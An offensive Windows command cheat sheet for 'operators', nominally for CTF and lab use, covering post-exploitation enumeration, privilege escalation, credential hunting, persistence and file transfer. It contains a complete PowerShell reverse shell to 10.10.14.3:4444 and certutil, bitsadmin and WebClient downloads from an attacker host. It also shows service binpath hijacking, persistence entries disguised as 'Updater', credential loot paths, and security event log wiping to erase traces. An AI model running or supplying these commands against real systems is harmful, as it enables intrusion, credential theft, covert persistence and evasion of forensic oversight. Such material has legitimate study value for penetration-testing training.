Windows CMDs 4 Hackers
Windows Command Line for Operators — Post-Exploitation & Enumeration Arsenal (CTF/Lab Use Only)
I. 🧩 System Discovery & Recon
🧠 Basic Info
whoami
hostname
ver
systeminfo
wmic os get caption,version,buildnumber
⚙️ User & Group Info
net user
net user <username>
net localgroup
net localgroup administrators
whoami /groups
💡 System Architecture
echo %PROCESSOR_ARCHITECTURE%
wmic os get osarchitecture
🧱 Network Overview
ipconfig /all
arp -a
netstat -ano
route print
nslookup <domain>
tracert <target>
II. 🧭 Privilege Escalation Enumeration
🔒 Local Privileges
whoami /priv
net localgroup administrators
net localgroup "Remote Desktop Users"
⚙️ Service Enumeration
sc query
sc queryex type= service state= all
tasklist /svc
wmic service get name,startname,startmode,state
🧱 Scheduled Tasks
schtasks /query /fo LIST /v
🧠 Auto Runs & Startup
wmic startup get caption,command
reg query HKLM\Software\Microsoft\Windows\CurrentVersion\Run
III. 🧩 File System & Hidden Data
🔍 File Discovery
dir /s /b C:\Users\*.txt
dir /s /b C:\*.kdbx
dir /a
attrib (view hidden/system attributes)
🔑 Sensitive Files
findstr /si password *.txt *.ini *.config
findstr /si "conn string" *.config
findstr /si "key" web.config
🧠 Search for Flags (CTFs)
dir /s /b C:\ | find "flag"
findstr /si "flag{" C:\Users\*.*
IV. 🧩 Processes, Tasks & Services
tasklist
tasklist /v
taskkill /pid <PID> /f
wmic process list brief
wmic process get name,processid,executablepath
Check parent-child relations:
wmic process get parentprocessid,processid,executablepath
Service manipulation:
sc stop <service>
sc config <service> binpath= "C:\Temp\reverse.exe"
sc start <service>
V. ⚙️ Network & Remote Enumeration
net view \\<target>
net view /domain
net use
net use \\target\C$ /user:Administrator
🧠 SMB Shares
net share
wmic share get name,path,status
💡 Active Sessions
query user
qwinsta
net session
VI. 🧱 Local Enumeration — WMI & WMIC
🧠 Hardware & Software
wmic computersystem get name,domain,manufacturer,model
wmic product get name,version
⚙️ Network
wmic nicconfig get ipaddress,macaddress,servicename
🔑 User Info
wmic useraccount get name,sid,status
VII. 🧠 Windows Registry Arsenal
reg query HKLM\Software\Microsoft\Windows\CurrentVersion\Run
reg query HKCU\Software\Microsoft\Windows\CurrentVersion\Run
reg query HKLM\SYSTEM\CurrentControlSet\Services
Find stored credentials:
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon"
Export keys for analysis:
reg export HKLM\Software\key C:\Temp\key.reg
VIII. 🧱 User Persistence & Scheduled Execution
🧠 Startup Persistence
copy shell.bat "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\"
⚙️ Registry Persistence
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v Updater /t REG_SZ /d "C:\Users\Public\update.ps1"
💣 Scheduled Task
schtasks /create /sc onlogon /tn "Updater" /tr "C:\Users\Public\update.bat"
IX. 🧰 File Transfer Arsenal
🔄 PowerShell
powershell -c "(New-Object Net.WebClient).DownloadFile('http://10.10.14.2/file.exe','C:\Temp\file.exe')"
💡 Certutil
certutil -urlcache -split -f http://10.10.14.2/file.exe file.exe
⚙️ SMB / FTP / Bitsadmin
copy \\10.10.14.2\share\file.exe C:\Temp\
bitsadmin /transfer job /download /priority high http://10.10.14.2/file.exe C:\Temp\file.exe
X. 🧩 Privilege Escalation Vectors
🔑 Service Misconfig
sc qc <service>
icacls "C:\Program Files\Service"
💥 Unquoted Service Paths
wmic service get name,displayname,pathname,startmode | findstr /i "auto" | findstr /i /v "C:\Windows\\"
⚙️ Weak Permissions
icacls "C:\Program Files"
icacls "C:\Windows\Tasks"
🧠 Token Impersonation (Lab Use)
whoami /priv
Look for SeImpersonatePrivilege and SeAssignPrimaryTokenPrivilege in the output.
XI. 🧱 Credential Hunting (Legal Labs Only)
⚙️ Common Loot Paths
dir /s /b C:\Users\*\AppData\Roaming\Microsoft\Credentials\
dir /s /b C:\Users\*\AppData\Local\Microsoft\Vault\
dir /s /b C:\Users\*\AppData\Roaming\FileZilla\
🔑 Cached Credentials
cmdkey /list
💡 RDP History
reg query "HKCU\Software\Microsoft\Terminal Server Client\Servers"
XII. 🧩 Defense Awareness
🔥 Firewall Rules
netsh advfirewall show allprofiles
netsh advfirewall firewall show rule name=all
🧠 AV Detection
sc query windefend
wmic /namespace:\\root\SecurityCenter2 path AntiVirusProduct get displayName,productState
⚙️ Windows Event Logs
wevtutil el | find "Security"
wevtutil qe Security /f:text /c:10
XIII. 🧠 Reverse Shells (Lab / CTF Only)
powershell -nop -w hidden -c "$client = New-Object System.Net.Sockets.TCPClient('10.10.14.3',4444);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes,0,$bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0,$i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()}"
XIV. 🧠 Post-Exploitation Clean-Up
del /f /q C:\Temp\file.exe
reg delete HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v Updater /f
schtasks /delete /tn Updater /f
wevtutil cl Security
XV. ⚡ Operator Shortcuts Table
Category               Command                         Description
User Info              net user, whoami /groups        Enumerate accounts
Network                ipconfig /all, netstat -ano     View adapters/ports
Privilege Escalation   whoami /priv, sudo -l           Identify privilege context
Services               sc qc, wmic service get ...     Inspect misconfigurations
Persistence            schtasks, reg add ...Run        Maintain presence
Transfer               certutil, bitsadmin             File movement
Clean-Up               wevtutil cl, del /f /q          Erase traces